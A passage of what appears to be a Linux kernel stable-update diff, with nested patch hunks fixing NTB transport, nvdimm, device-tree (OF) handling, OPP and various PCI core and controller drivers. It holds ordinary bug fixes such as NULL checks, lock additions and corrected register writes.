++	ret = kstrtobool_from_user(user_buf, count, &btc_manual);
++	if (ret)
++		return ret;
+ 
+ 	btc->ctrl.manual = btc_manual;
+-out:
++
+ 	return count;
+ }
+ 
+diff --git a/drivers/ntb/ntb_transport.c b/drivers/ntb/ntb_transport.c
+index 2abd2235bbcab..9532108d2dce1 100644
+--- a/drivers/ntb/ntb_transport.c
++++ b/drivers/ntb/ntb_transport.c
+@@ -909,7 +909,7 @@ static int ntb_set_mw(struct ntb_transport_ctx *nt, int num_mw,
+ 	return 0;
+ }
+ 
+-static void ntb_qp_link_down_reset(struct ntb_transport_qp *qp)
++static void ntb_qp_link_context_reset(struct ntb_transport_qp *qp)
+ {
+ 	qp->link_is_up = false;
+ 	qp->active = false;
+@@ -932,6 +932,13 @@ static void ntb_qp_link_down_reset(struct ntb_transport_qp *qp)
+ 	qp->tx_async = 0;
+ }
+ 
++static void ntb_qp_link_down_reset(struct ntb_transport_qp *qp)
++{
++	ntb_qp_link_context_reset(qp);
++	if (qp->remote_rx_info)
++		qp->remote_rx_info->entry = qp->rx_max_entry - 1;
++}
++
+ static void ntb_qp_link_cleanup(struct ntb_transport_qp *qp)
+ {
+ 	struct ntb_transport_ctx *nt = qp->transport;
+@@ -1174,7 +1181,7 @@ static int ntb_transport_init_queue(struct ntb_transport_ctx *nt,
+ 	qp->ndev = nt->ndev;
+ 	qp->client_ready = false;
+ 	qp->event_handler = NULL;
+-	ntb_qp_link_down_reset(qp);
++	ntb_qp_link_context_reset(qp);
+ 
+ 	if (mw_num < qp_count % mw_count)
+ 		num_qps_mw = qp_count / mw_count + 1;
+@@ -2276,9 +2283,13 @@ int ntb_transport_tx_enqueue(struct ntb_transport_qp *qp, void *cb, void *data,
+ 	struct ntb_queue_entry *entry;
+ 	int rc;
+ 
+-	if (!qp || !qp->link_is_up || !len)
++	if (!qp || !len)
+ 		return -EINVAL;
+ 
++	/* If the qp link is down already, just ignore. */
++	if (!qp->link_is_up)
++		return 0;
++
+ 	entry = ntb_list_rm(&qp->ntb_tx_free_q_lock, &qp->tx_free_q);
+ 	if (!entry) {
+ 		qp->tx_err_no_buf++;
+@@ -2418,7 +2429,7 @@ unsigned int ntb_transport_tx_free_entry(struct ntb_transport_qp *qp)
+ 	unsigned int head = qp->tx_index;
+ 	unsigned int tail = qp->remote_rx_info->entry;
+ 
+-	return tail > head ? tail - head : qp->tx_max_entry + tail - head;
++	return tail >= head ? tail - head : qp->tx_max_entry + tail - head;
+ }
+ EXPORT_SYMBOL_GPL(ntb_transport_tx_free_entry);
+ 
+diff --git a/drivers/nvdimm/nd_perf.c b/drivers/nvdimm/nd_perf.c
+index 433bbb68ae641..2b6dc80d8fb5b 100644
+--- a/drivers/nvdimm/nd_perf.c
++++ b/drivers/nvdimm/nd_perf.c
+@@ -308,8 +308,8 @@ int register_nvdimm_pmu(struct nvdimm_pmu *nd_pmu, struct platform_device *pdev)
+ 
+ 	rc = perf_pmu_register(&nd_pmu->pmu, nd_pmu->pmu.name, -1);
+ 	if (rc) {
+-		kfree(nd_pmu->pmu.attr_groups);
+ 		nvdimm_pmu_free_hotplug_memory(nd_pmu);
++		kfree(nd_pmu->pmu.attr_groups);
+ 		return rc;
+ 	}
+ 
+@@ -324,6 +324,7 @@ void unregister_nvdimm_pmu(struct nvdimm_pmu *nd_pmu)
+ {
+ 	perf_pmu_unregister(&nd_pmu->pmu);
+ 	nvdimm_pmu_free_hotplug_memory(nd_pmu);
++	kfree(nd_pmu->pmu.attr_groups);
+ 	kfree(nd_pmu);
+ }
+ EXPORT_SYMBOL_GPL(unregister_nvdimm_pmu);
+diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c
+index 4e436f2d13aeb..95501b77ef314 100644
+--- a/drivers/of/dynamic.c
++++ b/drivers/of/dynamic.c
+@@ -225,6 +225,7 @@ static void __of_attach_node(struct device_node *np)
+ 	np->sibling = np->parent->child;
+ 	np->parent->child = np;
+ 	of_node_clear_flag(np, OF_DETACHED);
++	np->fwnode.flags |= FWNODE_FLAG_NOT_DEVICE;
+ }
+ 
+ /**
+diff --git a/drivers/of/overlay.c b/drivers/of/overlay.c
+index 5289975bad708..4402871b5c0c0 100644
+--- a/drivers/of/overlay.c
++++ b/drivers/of/overlay.c
+@@ -752,8 +752,6 @@ static int init_overlay_changeset(struct overlay_changeset *ovcs)
+ 	if (!of_node_is_root(ovcs->overlay_root))
+ 		pr_debug("%s() ovcs->overlay_root is not root\n", __func__);
+ 
+-	of_changeset_init(&ovcs->cset);
+-
+ 	cnt = 0;
+ 
+ 	/* fragment nodes */
+@@ -1013,6 +1011,7 @@ int of_overlay_fdt_apply(const void *overlay_fdt, u32 overlay_fdt_size,
+ 
+ 	INIT_LIST_HEAD(&ovcs->ovcs_list);
+ 	list_add_tail(&ovcs->ovcs_list, &ovcs_list);
++	of_changeset_init(&ovcs->cset);
+ 
+ 	/*
+ 	 * Must create permanent copy of FDT because of_fdt_unflatten_tree()
+diff --git a/drivers/of/platform.c b/drivers/of/platform.c
+index e181c3f50f1da..bf96862cb7003 100644
+--- a/drivers/of/platform.c
++++ b/drivers/of/platform.c
+@@ -741,6 +741,11 @@ static int of_platform_notify(struct notifier_block *nb,
+ 		if (of_node_check_flag(rd->dn, OF_POPULATED))
+ 			return NOTIFY_OK;
+ 
++		/*
++		 * Clear the flag before adding the device so that fw_devlink
++		 * doesn't skip adding consumers to this device.
++		 */
++		rd->dn->fwnode.flags &= ~FWNODE_FLAG_NOT_DEVICE;
+ 		/* pdev_parent may be NULL when no bus platform device */
+ 		pdev_parent = of_find_device_by_node(rd->dn->parent);
+ 		pdev = of_platform_device_create(rd->dn, NULL,
+diff --git a/drivers/of/property.c b/drivers/of/property.c
+index 134cfc980b70b..b636777e6f7c8 100644
+--- a/drivers/of/property.c
++++ b/drivers/of/property.c
+@@ -1062,20 +1062,6 @@ of_fwnode_device_get_match_data(const struct fwnode_handle *fwnode,
+ 	return of_device_get_match_data(dev);
+ }
+ 
+-static bool of_is_ancestor_of(struct device_node *test_ancestor,
+-			      struct device_node *child)
+-{
+-	of_node_get(child);
+-	while (child) {
+-		if (child == test_ancestor) {
+-			of_node_put(child);
+-			return true;
+-		}
+-		child = of_get_next_parent(child);
+-	}
+-	return false;
+-}
+-
+ static struct device_node *of_get_compat_node(struct device_node *np)
+ {
+ 	of_node_get(np);
+@@ -1106,71 +1092,27 @@ static struct device_node *of_get_compat_node_parent(struct device_node *np)
+ 	return node;
+ }
+ 
+-/**
+- * of_link_to_phandle - Add fwnode link to supplier from supplier phandle
+- * @con_np: consumer device tree node
+- * @sup_np: supplier device tree node
+- *
+- * Given a phandle to a supplier device tree node (@sup_np), this function
+- * finds the device that owns the supplier device tree node and creates a
+- * device link from @dev consumer device to the supplier device. This function
+- * doesn't create device links for invalid scenarios such as trying to create a
+- * link with a parent device as the consumer of its child device. In such
+- * cases, it returns an error.
+- *
+- * Returns:
+- * - 0 if fwnode link successfully created to supplier
+- * - -EINVAL if the supplier link is invalid and should not be created
+- * - -ENODEV if struct device will never be create for supplier
+- */
+-static int of_link_to_phandle(struct device_node *con_np,
++static void of_link_to_phandle(struct device_node *con_np,
+ 			      struct device_node *sup_np)
+ {
+-	struct device *sup_dev;
+-	struct device_node *tmp_np = sup_np;
++	struct device_node *tmp_np = of_node_get(sup_np);
+ 
+-	/*
+-	 * Find the device node that contains the supplier phandle.  It may be
+-	 * @sup_np or it may be an ancestor of @sup_np.
+-	 */
+-	sup_np = of_get_compat_node(sup_np);
+-	if (!sup_np) {
+-		pr_debug("Not linking %pOFP to %pOFP - No device\n",
+-			 con_np, tmp_np);
+-		return -ENODEV;
+-	}
++	/* Check that sup_np and its ancestors are available. */
++	while (tmp_np) {
++		if (of_fwnode_handle(tmp_np)->dev) {
++			of_node_put(tmp_np);
++			break;
++		}
+ 
+-	/*
+-	 * Don't allow linking a device node as a consumer of one of its
+-	 * descendant nodes. By definition, a child node can't be a functional
+-	 * dependency for the parent node.
+-	 */
+-	if (of_is_ancestor_of(con_np, sup_np)) {
+-		pr_debug("Not linking %pOFP to %pOFP - is descendant\n",
+-			 con_np, sup_np);
+-		of_node_put(sup_np);
+-		return -EINVAL;
+-	}
++		if (!of_device_is_available(tmp_np)) {
++			of_node_put(tmp_np);
++			return;
++		}
+ 
+-	/*
+-	 * Don't create links to "early devices" that won't have struct devices
+-	 * created for them.
+-	 */
+-	sup_dev = get_dev_from_fwnode(&sup_np->fwnode);
+-	if (!sup_dev &&
+-	    (of_node_check_flag(sup_np, OF_POPULATED) ||
+-	     sup_np->fwnode.flags & FWNODE_FLAG_NOT_DEVICE)) {
+-		pr_debug("Not linking %pOFP to %pOFP - No struct device\n",
+-			 con_np, sup_np);
+-		of_node_put(sup_np);
+-		return -ENODEV;
++		tmp_np = of_get_next_parent(tmp_np);
+ 	}
+-	put_device(sup_dev);
+ 
+ 	fwnode_link_add(of_fwnode_handle(con_np), of_fwnode_handle(sup_np));
+-	of_node_put(sup_np);
+-
+-	return 0;
+ }
+ 
+ /**
+@@ -1324,6 +1266,7 @@ DEFINE_SIMPLE_PROP(pwms, "pwms", "#pwm-cells")
+ DEFINE_SIMPLE_PROP(resets, "resets", "#reset-cells")
+ DEFINE_SIMPLE_PROP(leds, "leds", NULL)
+ DEFINE_SIMPLE_PROP(backlight, "backlight", NULL)
++DEFINE_SIMPLE_PROP(panel, "panel", NULL)
+ DEFINE_SUFFIX_PROP(regulators, "-supply", NULL)
+ DEFINE_SUFFIX_PROP(gpio, "-gpio", "#gpio-cells")
+ 
+@@ -1412,6 +1355,7 @@ static const struct supplier_bindings of_supplier_bindings[] = {
+ 	{ .parse_prop = parse_resets, },
+ 	{ .parse_prop = parse_leds, },
+ 	{ .parse_prop = parse_backlight, },
++	{ .parse_prop = parse_panel, },
+ 	{ .parse_prop = parse_gpio_compat, },
+ 	{ .parse_prop = parse_interrupts, },
+ 	{ .parse_prop = parse_regulators, },
+diff --git a/drivers/of/unittest.c b/drivers/of/unittest.c
+index 9be6ed47a1ce4..edd2342598e49 100644
+--- a/drivers/of/unittest.c
++++ b/drivers/of/unittest.c
+@@ -70,7 +70,7 @@ static void __init of_unittest_find_node_by_name(void)
+ 
+ 	np = of_find_node_by_path("/testcase-data");
+ 	name = kasprintf(GFP_KERNEL, "%pOF", np);
+-	unittest(np && !strcmp("/testcase-data", name),
++	unittest(np && name && !strcmp("/testcase-data", name),
+ 		"find /testcase-data failed\n");
+ 	of_node_put(np);
+ 	kfree(name);
+@@ -81,14 +81,14 @@ static void __init of_unittest_find_node_by_name(void)
+ 
+ 	np = of_find_node_by_path("/testcase-data/phandle-tests/consumer-a");
+ 	name = kasprintf(GFP_KERNEL, "%pOF", np);
+-	unittest(np && !strcmp("/testcase-data/phandle-tests/consumer-a", name),
++	unittest(np && name && !strcmp("/testcase-data/phandle-tests/consumer-a", name),
+ 		"find /testcase-data/phandle-tests/consumer-a failed\n");
+ 	of_node_put(np);
+ 	kfree(name);
+ 
+ 	np = of_find_node_by_path("testcase-alias");
+ 	name = kasprintf(GFP_KERNEL, "%pOF", np);
+-	unittest(np && !strcmp("/testcase-data", name),
++	unittest(np && name && !strcmp("/testcase-data", name),
+ 		"find testcase-alias failed\n");
+ 	of_node_put(np);
+ 	kfree(name);
+@@ -99,7 +99,7 @@ static void __init of_unittest_find_node_by_name(void)
+ 
+ 	np = of_find_node_by_path("testcase-alias/phandle-tests/consumer-a");
+ 	name = kasprintf(GFP_KERNEL, "%pOF", np);
+-	unittest(np && !strcmp("/testcase-data/phandle-tests/consumer-a", name),
++	unittest(np && name && !strcmp("/testcase-data/phandle-tests/consumer-a", name),
+ 		"find testcase-alias/phandle-tests/consumer-a failed\n");
+ 	of_node_put(np);
+ 	kfree(name);
+@@ -1379,6 +1379,8 @@ static void attach_node_and_children(struct device_node *np)
+ 	const char *full_name;
+ 
+ 	full_name = kasprintf(GFP_KERNEL, "%pOF", np);
++	if (!full_name)
++		return;
+ 
+ 	if (!strcmp(full_name, "/__local_fixups__") ||
+ 	    !strcmp(full_name, "/__fixups__")) {
+@@ -2060,7 +2062,7 @@ static int __init of_unittest_apply_revert_overlay_check(int overlay_nr,
+ 	of_unittest_untrack_overlay(save_ovcs_id);
+ 
+ 	/* unittest device must be again in before state */
+-	if (of_unittest_device_exists(unittest_nr, PDEV_OVERLAY) != before) {
++	if (of_unittest_device_exists(unittest_nr, ovtype) != before) {
+ 		unittest(0, "%s with device @\"%s\" %s\n",
+ 				overlay_name_from_nr(overlay_nr),
+ 				unittest_path(unittest_nr, ovtype),
+diff --git a/drivers/opp/core.c b/drivers/opp/core.c
+index d707214069ca9..f0d70ecc0271b 100644
+--- a/drivers/opp/core.c
++++ b/drivers/opp/core.c
+@@ -2372,7 +2372,7 @@ static int _opp_attach_genpd(struct opp_table *opp_table, struct device *dev,
+ 
+ 		virt_dev = dev_pm_domain_attach_by_name(dev, *name);
+ 		if (IS_ERR_OR_NULL(virt_dev)) {
+-			ret = PTR_ERR(virt_dev) ? : -ENODEV;
++			ret = virt_dev ? PTR_ERR(virt_dev) : -ENODEV;
+ 			dev_err(dev, "Couldn't attach to pm_domain: %d\n", ret);
+ 			goto err;
+ 		}
+diff --git a/drivers/pci/access.c b/drivers/pci/access.c
+index 708c7529647fd..3d20f9c51efe7 100644
+--- a/drivers/pci/access.c
++++ b/drivers/pci/access.c
+@@ -491,8 +491,8 @@ int pcie_capability_write_dword(struct pci_dev *dev, int pos, u32 val)
+ }
+ EXPORT_SYMBOL(pcie_capability_write_dword);
+ 
+-int pcie_capability_clear_and_set_word(struct pci_dev *dev, int pos,
+-				       u16 clear, u16 set)
++int pcie_capability_clear_and_set_word_unlocked(struct pci_dev *dev, int pos,
++						u16 clear, u16 set)
+ {
+ 	int ret;
+ 	u16 val;
+@@ -506,7 +506,21 @@ int pcie_capability_clear_and_set_word(struct pci_dev *dev, int pos,
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL(pcie_capability_clear_and_set_word);
++EXPORT_SYMBOL(pcie_capability_clear_and_set_word_unlocked);
++
++int pcie_capability_clear_and_set_word_locked(struct pci_dev *dev, int pos,
++					      u16 clear, u16 set)
++{
++	unsigned long flags;
++	int ret;
++
++	spin_lock_irqsave(&dev->pcie_cap_lock, flags);
++	ret = pcie_capability_clear_and_set_word_unlocked(dev, pos, clear, set);
++	spin_unlock_irqrestore(&dev->pcie_cap_lock, flags);
++
++	return ret;
++}
++EXPORT_SYMBOL(pcie_capability_clear_and_set_word_locked);
+ 
+ int pcie_capability_clear_and_set_dword(struct pci_dev *dev, int pos,
+ 					u32 clear, u32 set)
+diff --git a/drivers/pci/controller/dwc/pcie-qcom-ep.c b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+index 6d0d1b759ca24..d4c566c1c8725 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom-ep.c
++++ b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+@@ -410,7 +410,7 @@ static int qcom_pcie_perst_deassert(struct dw_pcie *pci)
+ 	/* Gate Master AXI clock to MHI bus during L1SS */
+ 	val = readl_relaxed(pcie_ep->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 	val &= ~PARF_MSTR_AXI_CLK_EN;
+-	val = readl_relaxed(pcie_ep->parf + PARF_MHI_CLOCK_RESET_CTRL);
++	writel_relaxed(val, pcie_ep->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 
+ 	dw_pcie_ep_init_notify(&pcie_ep->pci.ep);
+ 
+diff --git a/drivers/pci/controller/dwc/pcie-tegra194.c b/drivers/pci/controller/dwc/pcie-tegra194.c
+index 528e73ccfa43e..2241029537a03 100644
+--- a/drivers/pci/controller/dwc/pcie-tegra194.c
++++ b/drivers/pci/controller/dwc/pcie-tegra194.c
+@@ -879,11 +879,6 @@ static int tegra_pcie_dw_host_init(struct dw_pcie_rp *pp)
+ 		pcie->pcie_cap_base = dw_pcie_find_capability(&pcie->pci,
+ 							      PCI_CAP_ID_EXP);
+ 
+-	val_16 = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base + PCI_EXP_DEVCTL);
+-	val_16 &= ~PCI_EXP_DEVCTL_PAYLOAD;
+-	val_16 |= PCI_EXP_DEVCTL_PAYLOAD_256B;
+-	dw_pcie_writew_dbi(pci, pcie->pcie_cap_base + PCI_EXP_DEVCTL, val_16);
+-
+ 	val = dw_pcie_readl_dbi(pci, PCI_IO_BASE);
+ 	val &= ~(IO_BASE_IO_DECODE | IO_BASE_IO_DECODE_BIT8);
+ 	dw_pcie_writel_dbi(pci, PCI_IO_BASE, val);
+@@ -1872,11 +1867,6 @@ static void pex_ep_event_pex_rst_deassert(struct tegra_pcie_dw *pcie)
+ 	pcie->pcie_cap_base = dw_pcie_find_capability(&pcie->pci,
+ 						      PCI_CAP_ID_EXP);
+ 
+-	val_16 = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base + PCI_EXP_DEVCTL);
+-	val_16 &= ~PCI_EXP_DEVCTL_PAYLOAD;
+-	val_16 |= PCI_EXP_DEVCTL_PAYLOAD_256B;
+-	dw_pcie_writew_dbi(pci, pcie->pcie_cap_base + PCI_EXP_DEVCTL, val_16);
+-
+ 	/* Clear Slot Clock Configuration bit if SRNS configuration */
+ 	if (pcie->enable_srns) {
+ 		val_16 = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base +
+diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c
+index 3351863352d36..9693bab59bf7c 100644
+--- a/drivers/pci/controller/pci-hyperv.c
++++ b/drivers/pci/controller/pci-hyperv.c
+@@ -3930,6 +3930,9 @@ static int hv_pci_restore_msi_msg(struct pci_dev *pdev, void *arg)
+ 	struct msi_desc *entry;
+ 	int ret = 0;
+ 
++	if (!pdev->msi_enabled && !pdev->msix_enabled)
++		return 0;
++
+ 	msi_lock_descs(&pdev->dev);
+ 	msi_for_each_desc(entry, &pdev->dev, MSI_DESC_ASSOCIATED) {
+ 		irq_data = irq_get_irq_data(entry->irq);
+diff --git a/drivers/pci/controller/pcie-apple.c b/drivers/pci/controller/pcie-apple.c
+index 66f37e403a09c..2340dab6cd5bd 100644
+--- a/drivers/pci/controller/pcie-apple.c
++++ b/drivers/pci/controller/pcie-apple.c
+@@ -783,6 +783,10 @@ static int apple_pcie_init(struct pci_config_window *cfg)
+ 	cfg->priv = pcie;
+ 	INIT_LIST_HEAD(&pcie->ports);
+ 
++	ret = apple_msi_init(pcie);
++	if (ret)
++		return ret;
++
+ 	for_each_child_of_node(dev->of_node, of_port) {
+ 		ret = apple_pcie_setup_port(pcie, of_port);
+ 		if (ret) {
+@@ -792,7 +796,7 @@ static int apple_pcie_init(struct pci_config_window *cfg)
+ 		}
+ 	}
+ 
+-	return apple_msi_init(pcie);
++	return 0;
+ }
+ 
+ static int apple_pcie_probe(struct platform_device *pdev)
+diff --git a/drivers/pci/controller/pcie-microchip-host.c b/drivers/pci/controller/pcie-microchip-host.c
+index 7263d175b5adb..5ba101efd9326 100644
+--- a/drivers/pci/controller/pcie-microchip-host.c
++++ b/drivers/pci/controller/pcie-microchip-host.c
+@@ -167,12 +167,12 @@
+ #define EVENT_PCIE_DLUP_EXIT			2
+ #define EVENT_SEC_TX_RAM_SEC_ERR		3
+ #define EVENT_SEC_RX_RAM_SEC_ERR		4
+-#define EVENT_SEC_AXI2PCIE_RAM_SEC_ERR		5
+-#define EVENT_SEC_PCIE2AXI_RAM_SEC_ERR		6
++#define EVENT_SEC_PCIE2AXI_RAM_SEC_ERR		5
++#define EVENT_SEC_AXI2PCIE_RAM_SEC_ERR		6
+ #define EVENT_DED_TX_RAM_DED_ERR		7
+ #define EVENT_DED_RX_RAM_DED_ERR		8
+-#define EVENT_DED_AXI2PCIE_RAM_DED_ERR		9
+-#define EVENT_DED_PCIE2AXI_RAM_DED_ERR		10
++#define EVENT_DED_PCIE2AXI_RAM_DED_ERR		9
++#define EVENT_DED_AXI2PCIE_RAM_DED_ERR		10
+ #define EVENT_LOCAL_DMA_END_ENGINE_0		11
+ #define EVENT_LOCAL_DMA_END_ENGINE_1		12
+ #define EVENT_LOCAL_DMA_ERROR_ENGINE_0		13
+diff --git a/drivers/pci/controller/pcie-rockchip.h b/drivers/pci/controller/pcie-rockchip.h
+index fe0333778fd93..6111de35f84ca 100644
+--- a/drivers/pci/controller/pcie-rockchip.h
++++ b/drivers/pci/controller/pcie-rockchip.h
+@@ -158,7 +158,9 @@
+ #define PCIE_RC_CONFIG_THP_CAP		(PCIE_RC_CONFIG_BASE + 0x274)
+ #define   PCIE_RC_CONFIG_THP_CAP_NEXT_MASK	GENMASK(31, 20)
+ 
+-#define PCIE_ADDR_MASK			0xffffff00
++#define MAX_AXI_IB_ROOTPORT_REGION_NUM		3
++#define MIN_AXI_ADDR_BITS_PASSED		8
++#define PCIE_ADDR_MASK			GENMASK_ULL(63, MIN_AXI_ADDR_BITS_PASSED)
+ #define PCIE_CORE_AXI_CONF_BASE		0xc00000
+ #define PCIE_CORE_OB_REGION_ADDR0	(PCIE_CORE_AXI_CONF_BASE + 0x0)
+ #define   PCIE_CORE_OB_REGION_ADDR0_NUM_BITS	0x3f
+@@ -185,8 +187,6 @@
+ #define AXI_WRAPPER_TYPE1_CFG			0xb
+ #define AXI_WRAPPER_NOR_MSG			0xc
+ 
+-#define MAX_AXI_IB_ROOTPORT_REGION_NUM		3
+-#define MIN_AXI_ADDR_BITS_PASSED		8
+ #define PCIE_RC_SEND_PME_OFF			0x11960
+ #define ROCKCHIP_VENDOR_ID			0x1d87
+ #define PCIE_LINK_IS_L2(x) \
+diff --git a/drivers/pci/doe.c b/drivers/pci/doe.c
+index e5e9b287b9766..c1776f82b7fce 100644
+--- a/drivers/pci/doe.c
++++ b/drivers/pci/doe.c
+@@ -223,8 +223,8 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ static void signal_task_complete(struct pci_doe_task *task, int rv)
+ {
+ 	task->rv = rv;
+-	task->complete(task);
+ 	destroy_work_on_stack(&task->work);
++	task->complete(task);
+ }
+ 
+ static void signal_task_abort(struct pci_doe_task *task, int rv)
+diff --git a/drivers/pci/hotplug/pciehp_hpc.c b/drivers/pci/hotplug/pciehp_hpc.c
+index 112c8f401ac4e..358f077284cbe 100644
+--- a/drivers/pci/hotplug/pciehp_hpc.c
++++ b/drivers/pci/hotplug/pciehp_hpc.c
+@@ -332,17 +332,11 @@ int pciehp_check_link_status(struct controller *ctrl)
+ static int __pciehp_link_set(struct controller *ctrl, bool enable)
+ {
+ 	struct pci_dev *pdev = ctrl_dev(ctrl);
+-	u16 lnk_ctrl;
+ 
+-	pcie_capability_read_word(pdev, PCI_EXP_LNKCTL, &lnk_ctrl);
++	pcie_capability_clear_and_set_word(pdev, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_LD,
++					   enable ? 0 : PCI_EXP_LNKCTL_LD);
+ 
+-	if (enable)
+-		lnk_ctrl &= ~PCI_EXP_LNKCTL_LD;
+-	else
+-		lnk_ctrl |= PCI_EXP_LNKCTL_LD;
+-
+-	pcie_capability_write_word(pdev, PCI_EXP_LNKCTL, lnk_ctrl);
+-	ctrl_dbg(ctrl, "%s: lnk_ctrl = %x\n", __func__, lnk_ctrl);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pci/pci-sysfs.c b/drivers/pci/pci-sysfs.c
+index ba38fc47d35e9..dd0d9d9bc5097 100644
+--- a/drivers/pci/pci-sysfs.c
++++ b/drivers/pci/pci-sysfs.c
+@@ -756,6 +756,13 @@ static ssize_t pci_write_config(struct file *filp, struct kobject *kobj,
+ 	if (ret)
+ 		return ret;
+ 
++	if (resource_is_exclusive(&dev->driver_exclusive_resource, off,
++				  count)) {
++		pci_warn_once(dev, "%s: Unexpected write to kernel-exclusive config offset %llx",
++			      current->comm, off);
++		add_taint(TAINT_USER, LOCKDEP_STILL_OK);
++	}
++
+ 	if (off > dev->cfg_size)
+ 		return 0;
+ 	if (off + count > dev->cfg_size) {
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 88c4372499825..835e9ea14b3a1 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -1193,6 +1193,10 @@ static int pci_dev_wait(struct pci_dev *dev, char *reset_type, int timeout)
+  *
+  * On success, return 0 or 1, depending on whether or not it is necessary to
+  * restore the device's BARs subsequently (1 is returned in that case).
++ *
++ * On failure, return a negative error code.  Always return failure if @dev
++ * lacks a Power Management Capability, even if the platform was able to
++ * put the device in D0 via non-PCI means.
+  */
+ int pci_power_up(struct pci_dev *dev)
+ {
+@@ -1209,9 +1213,6 @@ int pci_power_up(struct pci_dev *dev)
+ 		else
+ 			dev->current_state = state;
+ 
+-		if (state == PCI_D0)
+-			return 0;
+-
+ 		return -EIO;
+ 	}
+ 
+@@ -1269,8 +1270,12 @@ static int pci_set_full_power_state(struct pci_dev *dev)
+ 	int ret;
+ 
+ 	ret = pci_power_up(dev);
+-	if (ret < 0)
++	if (ret < 0) {
++		if (dev->current_state == PCI_D0)
++			return 0;
++
+ 		return ret;
++	}
+ 
+ 	pci_read_config_word(dev, dev->pm_cap + PCI_PM_CTRL, &pmcsr);
+ 	dev->current_state = pmcsr & PCI_PM_CTRL_STATE_MASK;
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 07166a4ec27ad..7e89cdbd446fc 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -250,7 +250,7 @@ static int pcie_retrain_link(struct pcie_link_state *link)
+ static void pcie_aspm_configure_common_clock(struct pcie_link_state *link)
+ {
+ 	int same_clock = 1;
+-	u16 reg16, parent_reg, child_reg[8];
++	u16 reg16, ccc, parent_old_ccc, child_old_ccc[8];
+ 	struct pci_dev *child, *parent = link->pdev;
+ 	struct pci_bus *linkbus = parent->subordinate;
+ 	/*
+@@ -272,6 +272,7 @@ static void pcie_aspm_configure_common_clock(struct pcie_link_state *link)
+ 
+ 	/* Port might be already in common clock mode */
+ 	pcie_capability_read_word(parent, PCI_EXP_LNKCTL, &reg16);
++	parent_old_ccc = reg16 & PCI_EXP_LNKCTL_CCC;
+ 	if (same_clock && (reg16 & PCI_EXP_LNKCTL_CCC)) {
+ 		bool consistent = true;
+ 
+@@ -288,34 +289,29 @@ static void pcie_aspm_configure_common_clock(struct pcie_link_state *link)
+ 		pci_info(parent, "ASPM: current common clock configuration is inconsistent, reconfiguring\n");
+ 	}
+ 
++	ccc = same_clock ? PCI_EXP_LNKCTL_CCC : 0;
+ 	/* Configure downstream component, all functions */
+ 	list_for_each_entry(child, &linkbus->devices, bus_list) {
+ 		pcie_capability_read_word(child, PCI_EXP_LNKCTL, &reg16);
+-		child_reg[PCI_FUNC(child->devfn)] = reg16;
+-		if (same_clock)
+-			reg16 |= PCI_EXP_LNKCTL_CCC;
+-		else
+-			reg16 &= ~PCI_EXP_LNKCTL_CCC;
+-		pcie_capability_write_word(child, PCI_EXP_LNKCTL, reg16);
++		child_old_ccc[PCI_FUNC(child->devfn)] = reg16 & PCI_EXP_LNKCTL_CCC;
++		pcie_capability_clear_and_set_word(child, PCI_EXP_LNKCTL,
++						   PCI_EXP_LNKCTL_CCC, ccc);
+ 	}
+ 
+ 	/* Configure upstream component */
+-	pcie_capability_read_word(parent, PCI_EXP_LNKCTL, &reg16);
+-	parent_reg = reg16;
+-	if (same_clock)
+-		reg16 |= PCI_EXP_LNKCTL_CCC;
+-	else
+-		reg16 &= ~PCI_EXP_LNKCTL_CCC;
+-	pcie_capability_write_word(parent, PCI_EXP_LNKCTL, reg16);
++	pcie_capability_clear_and_set_word(parent, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_CCC, ccc);
+ 
+ 	if (pcie_retrain_link(link)) {
+ 
+ 		/* Training failed. Restore common clock configurations */
+ 		pci_err(parent, "ASPM: Could not configure common clock\n");
+ 		list_for_each_entry(child, &linkbus->devices, bus_list)
+-			pcie_capability_write_word(child, PCI_EXP_LNKCTL,
+-					   child_reg[PCI_FUNC(child->devfn)]);
+-		pcie_capability_write_word(parent, PCI_EXP_LNKCTL, parent_reg);
++			pcie_capability_clear_and_set_word(child, PCI_EXP_LNKCTL,
++							   PCI_EXP_LNKCTL_CCC,
++							   child_old_ccc[PCI_FUNC(child->devfn)]);
++		pcie_capability_clear_and_set_word(parent, PCI_EXP_LNKCTL,
++						   PCI_EXP_LNKCTL_CCC, parent_old_ccc);
+ 	}
+ }
+ 
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index 7170516298b0b..0945f50fe94ff 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -996,6 +996,7 @@ static int pci_register_host_bridge(struct pci_host_bridge *bridge)
+ 		res = window->res;
+ 		if (!res->flags && !res->start && !res->end) {
+ 			release_resource(res);
++			resource_list_destroy_entry(window);
+ 			continue;
+ 		}
+ 
+@@ -2306,6 +2307,13 @@ struct pci_dev *pci_alloc_dev(struct pci_bus *bus)
+ 	INIT_LIST_HEAD(&dev->bus_list);
+ 	dev->dev.type = &pci_dev_type;
+ 	dev->bus = pci_bus_get(bus);
++	dev->driver_exclusive_resource = (struct resource) {
++		.name = "PCI Exclusive",
++		.start = 0,
++		.end = -1,
++	};
++
++	spin_lock_init(&dev->pcie_cap_lock);
+ #ifdef CONFIG_PCI_MSI
+ 	raw_spin_lock_init(&dev->msi_lock);
+ #endif
+diff --git a/drivers/perf/fsl_imx8_ddr_perf.c b/drivers/perf/fsl_imx8_ddr_perf.c
+index 8e058e08fe810..cd4ce2b4906d1 100644
